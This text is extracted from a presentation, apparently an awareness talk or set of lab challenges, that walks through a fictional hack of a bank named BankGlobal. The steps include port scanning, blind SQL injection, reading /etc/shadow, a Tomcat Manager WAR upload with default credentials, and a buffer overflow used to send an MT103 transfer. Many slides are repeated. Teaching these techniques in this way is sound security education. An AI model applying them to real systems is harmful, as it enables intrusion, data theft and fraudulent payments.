2. WOW! It’s only taken me 3
seconds to hack into this
secure computer system
Misconceptions
about hacking…
3. The organization and people mentioned
throughout the remainder of this
presentation are not real
But….The techniques are!
4. Target...
BankGlobal is a medium sized bank.
We over heard some of their
employees talking in the hotel bar
about their security and we decided
to look into it.
5. Objectives…
See if we can find a way to access
sensitive financial information
belonging to the bank.
Steal the data, and modify it, so it’s
no longer useful to them.
6. Scenario 1#
Recon
From searching around online we
found one of BankGlobal’s IP
addresses <10.10.10.1>
Let’s see what we can figure out
from it via a port scan
8. Scenario 1#
Recon.
The first thing we do is identify the IP of the GlobalBank
website so that we can perform a port scan
Port 22 Secure Shell (SSH) – secure remote connection
Port 25 Simple Mail Transfer Protocol (SMTP)
Port 53 Domain Name Service (DNS)
Port 80 Webserver – which we know already
Port 443 Webserver – secure connection
Port 8080 - Non standard port used for various services
9. Scenario 1#
Port Scan, Zone Transfer, etc.
We browse to the web application and notice a
login screen. What can we do from here?
Looking at the page source we can see the
admin appears to have taken a shortcut by
attempting to hide the password in plain sight
Can we decode the value?
11. Scenario #2
SQL injection
Logging in successfully redirects us to a Staff
Directory page where we can verify employees
of Bank Global
A quick search of LinkedIn reveals the name
of a manager, Sarah Connor
I wonder if we can get any useful information
from the Staff Directory page?
12. Scenario #2
SQL injection
Let’s put some unexpected characters in the input fields
and see what happens
One of the parameters appears to be vulnerable to SQL
Injection, but doesn’t display the output on the page. Try
to inject Always True or Always False statements
Use the SUBSTR function to progress letter by letter and
observe how the application responds until you retrieve
Sarah Connor’s password
14. Scenario #3
Grab the hashes
Now that we have Sarah Connor’s password, I
wonder if we can login to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
15. Scenario #3
Grab the hashes
In unix machines, user passwords are encrypted
and stored in a file called /etc/shadow.
What about other interesting files?
19. Scenario #4
Default credentials and WAR file
Excellent! It’s an Apache Tomcat server. What
can we do with this?
Let’s see if we can find a way to gain better
access than what Sarah Connor had…
20. Scenario #4
Default credentials and WAR file
The server allows access to a Tomcat web
application called the Manager. Through this
application we can deploy a custom WAR file
It appears the manager requires authentication
to access it. I wonder if they assigned a good
password to the admin account?
22. Scenario #5
Password
protected .xls
We have obtained access to a confidential
spreadsheet belonging to Bank Global
They decided that password protecting sheets
would prevent unintended modification
Can we find a way to modify this file?
24. Scenario #6
Buffer Overflow
Bank Global has written their own program to
send MT103 messages without using SWIFT
interfaces
It is designed to ensure that only authorized
personnel can send messages.
25. Scenario #6
Buffer Overflow
A Buffer Overflow can occur when we input more
characters than the memory buffer can process
We were able to decompile the binary.
Look at the code to see if it tells you anything
Can we find a way to bypass authentication?
27. Mission Accomplished!
We were able to hack into BankGlobal,
steal the data, and modify it so they can’t
use it, and then send a MT103 to an
account we control.
28. Would this really work?
76% of breaches in 2018 were financially motivated (2018 Verizon Data Breach Report)
81% of hacking-related breaches leveraged either stolen or weak passwords ( 2017 Verizon Data Breach)
Heartland Payment Systems (2010) – SQL injection attacks resulting in more than $300 million loss
Magento (2019)– SQL injection exposed over 300,000 E-commerce websites and millions of users to attack
Misconceptions about hacking
TV shows and movies make hacking look really spectacular
It takes a Hollywood actor an average of 3 seconds to hack the most secure computer system
They are ALWAYS successful and NEVER caught
Anything can be instantly hacked: Banks, Schools, Hospitals, even time itself!
Don’t believe me???? Check out one of our all time favorite hacking scenes!
Lets See what this really looks like!
We have developed a series of “realistic” hacking challenges
These target common poor security practices
The scenario is that we are a hacker targeting a fictitious financial institution called “Bank Global”
Objective
. See if we can find a way to access sensitive financial information belonging to the bank
2. Steal the data, and modify it so it is no longer useful to them
Clue #1 Let’s put some unexpected characters in the input fields and see what happens
You browse to 10.10.10.1 over port 80 and find a Bank Global web application
It’s asking for authentication….
I wonder if we can bypass the authentication?
Clue #2 The admin appears to have taken a shortcut by attempting to hide the password in plain sight
Clue #1 Let’s put some unexpected characters in the input fields and see what happens
Logging in successfully redirects us to a Staff Directory page where we can verify employees of Bank Global
We overheard an employee in the hotel bar talking about an upcoming meeting with his boss, Sarah Connor
I wonder if we can get any useful information from the Staff Directory page?
Clue #1 Let’s put some unexpected characters in the input fields and see what happens
Clue #1 Let’s put some unexpected characters in the input fields and see what happens
Now that you have Sarah Connor’s password, I wonder if you can login to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
Clue #1 in unix machines, user passwords are encrypted and stored in a file called /etc/shadow
Did we get the hashes?
Now that you have Sarah Connor’s password, I wonder if you can login to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
Clue #1 in unix machines, user passwords are encrypted and stored in a file called /etc/shadow
Did we get the hashes?
Now that you have Sarah Connor’s password, I wonder if you can login to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
Clue #1 in unix machines, user passwords are encrypted and stored in a file called /etc/shadow
Did we get the hashes?
Our port scan also showed that port 8080 was open, let’s browse to it and see what it is
Our port scan also showed that port 8080 was open, let’s browse to it and see what it is
Excellent! It’s an Apache Tomcat server. I heard there are ways to exploit this
Let’s see if we can find a way to gain better access than what Sarah Connor had…..
Clue #1 The server allows access to a Tomcat web application called the Manager. Through this application we can deploy a custom WAR file
Our port scan also showed that port 8080 was open, let’s browse to it and see what it is
Scenario #1 Password protected .xls
We have obtained network access to a confidential spreadsheet belonging to Bank Global
They decided that password protecting sheets would prevent unintended modification
Will we ever find a way to modify this file????
This will be helpful later
Our port scan also showed that port 8080 was open, let’s browse to it and see what it is
Scenario #2 Buffer Overflow
Bank Global has written their own program to send MT103 messages without using SWIFT interfaces
It is designed to ensure that only authorized personnel can send messages
We have heard that it isn’t coded very well and may have some vulnerabilities present
Let’s see if we can bypass the authorization required
If their custom-developed program has such basic security flaws, I wonder how secure the rest of their network is?
Now that you have Sarah Connor’s password, I wonder if you can login to 10.10.10.1 via SSH?
Let’s see what Sarah has rights to do
Clue #1 in unix machines, user passwords are encrypted and stored in a file called /etc/shadow
Did we get the hashes?
Misconceptions about hacking
TV shows and movies make hacking look really spectacular
It takes a Hollywood actor an average of 3 seconds to hack the most secure computer system
They are ALWAYS successful and NEVER caught
Anything can be instantly hacked: Banks, Schools, Hospitals, even time itself!
Don’t believe me???? Check out one of our all time favorite hacking scenes!